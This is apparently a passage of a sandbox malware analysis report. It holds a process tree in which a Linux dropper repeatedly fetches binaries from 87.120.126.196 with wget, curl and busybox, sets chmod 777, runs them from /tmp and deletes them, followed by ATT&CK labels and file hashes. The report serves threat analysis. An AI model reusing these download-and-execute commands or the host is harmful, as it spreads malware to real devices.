- Executes dropped EXE
PID:941
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:945
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:951
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:957
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:963
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:969
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:972
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:975
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:978
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:979
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:981
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:984
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:985
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:987
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:990
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97